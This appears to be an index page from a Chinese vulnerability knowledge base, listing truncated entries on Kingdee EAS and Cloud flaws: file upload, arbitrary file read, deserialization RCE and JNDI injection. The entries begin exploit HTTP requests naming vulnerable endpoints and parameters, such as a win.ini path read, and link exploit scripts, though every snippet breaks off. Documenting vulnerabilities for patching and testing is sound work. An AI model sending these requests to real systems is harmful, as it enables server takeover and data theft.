通用系统漏洞

通用系统漏洞

  • 简介
  • 目录大纲
  • 最新文档

    ND002 kingdee-yxk-scpsupreghandler-fileupload

    ScpSupRegHandler 接口任意文件上传漏洞 漏洞分析 https://github.com/myh0st/scripts/blob/master/kingdee-scpsupreghandler-upload.py 漏洞复现 1、使用 burp 提交如下数据包: ``` POST /SRM/ScpSupRegHandler HTTP/1.1 Host: demo.xazlsec.……

    myh0st - 2024年11月21日 11:10

    JQ004 JDNI 注入漏洞利用

    漏洞利用需要借助第三方利用工具,比如 marshalsec、JNDIExploit 等,fastjson 复现时使用了 marshalsec,今天使用 JNDIExploit 来测试,项目地址: https://github.com/WhiteHSBG/JNDIExploit 首先在服务器上启动 JNDIExploit,借助 dnslog 回现命令执行的结果: java -jar JNDIE……

    myh0st - 2024年11月20日 18:12

    ND010 kingdee-eas-appUtil-rce

    金蝶EAS和金蝶EAS Cloud在多个版本中存在文件上传漏洞,未经授权的攻击者可以通过特制的请求包或上传恶意的webshell文件,从而进行远程代码执行,控制服务器。 漏洞分析 无 漏洞复现 1、使用 burp 提交如下数据包: ```javascript GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A……

    myh0st - 2024年11月20日 17:41

    ND002 kingdee-eas-extweb-fileread

    金蝶 EAS extweb 任意文件读取 漏洞分析 无 漏洞复现 1、使用 burp 提交如下数据包: ``` GET /easWebClient/deploy/client/ctrlhome/webapps/extweb/WEB-INF/web.xml HTTP/1.1 Host: bpm.xazlsec.com:6010 User-Agent: Mozilla/5.0 (Windows NT ……

    myh0st - 2024年11月20日 17:40

    ND005 kingdee-eas-config-infaleak

    金蝶-EAS easWebClient 存在任意文件读取漏洞,攻击者可读取config.jar等敏感配置文件信息。 漏洞分析 无 漏洞复现 1、使用浏览器下载: /easWebClient/bin/config.jar 2、结果如图 3、使用 xazlscan 一键检测如图 漏洞利用 具体危害,暂无进一步利用方法 漏洞修复建议 临时处置 1.针对xxx系统xxx接口相关参数做严格的过滤,配……

    myh0st - 2024年11月20日 17:40

    ND009 kingdee-eas-pdfViewLocal-fileread

    金蝶EAS_pdfviewlocal任意文件读取漏洞 漏洞分析 无 漏洞复现 1、使用 burp 提交如下数据包: ``` GET /plt_document/fragments/content/pdfViewLocal.jsp?path=C:/Windows/win.ini HTTP/1.1 Host: 40.mophone.net:8081 Cache-Control: max-age=0 U……

    myh0st - 2024年11月20日 17:39

    ND004 kingdee-cloud-user-deserialization

    UserService接口存在反序列化漏洞,未授权攻击者可以直接利用此漏洞执行系统命令,获取服务器权限。 漏洞分析 无 漏洞复现 1、使用 burp 提交如下数据包: ``` POST /Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc HTTP/1.1 Host: ip Us……

    myh0st - 2024年11月20日 17:36

    ND005 kingdee-yxk-GetServiceUri-rce

    金蝶星空云ServiceGateway.GetServiceUri.common.kdsvc接口存在反序列化漏洞,可执行恶意命令回显结果。 漏洞分析 无 漏洞复现 1、使用 burp 提交如下数据包: ``` POST /Kingdee.BOS.ServiceFacade.ServicesStub.ServiceGateway.GetServiceUri.common.kdsvc HTTP/1.1……

    myh0st - 2024年11月20日 17:36

    ND001 kingdee-erp-getbusinessobjectdata-rce

    xxx漏洞描述xx信息 漏洞分析 (有分析过程则编写 无则删除该块) 漏洞复现 1、使用 burp 提交如下数据包: ``` POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1 Host: xxxxx Content-Type: text/……

    myh0st - 2024年11月20日 17:35

    ND003 kingdee-commonfileserver-fileread

    CommonFileServer 接口存在任意文件读取漏洞 漏洞分析 python: https://github.com/myh0st/scripts/blob/master/kingdee-commonfileserver-fileread.py 漏洞复现 1、使用 burp 提交如下数据包: ``` GET /CommonFileServer/c:/ProgramData/Micros……

    myh0st - 2024年11月20日 17:24

    myh0st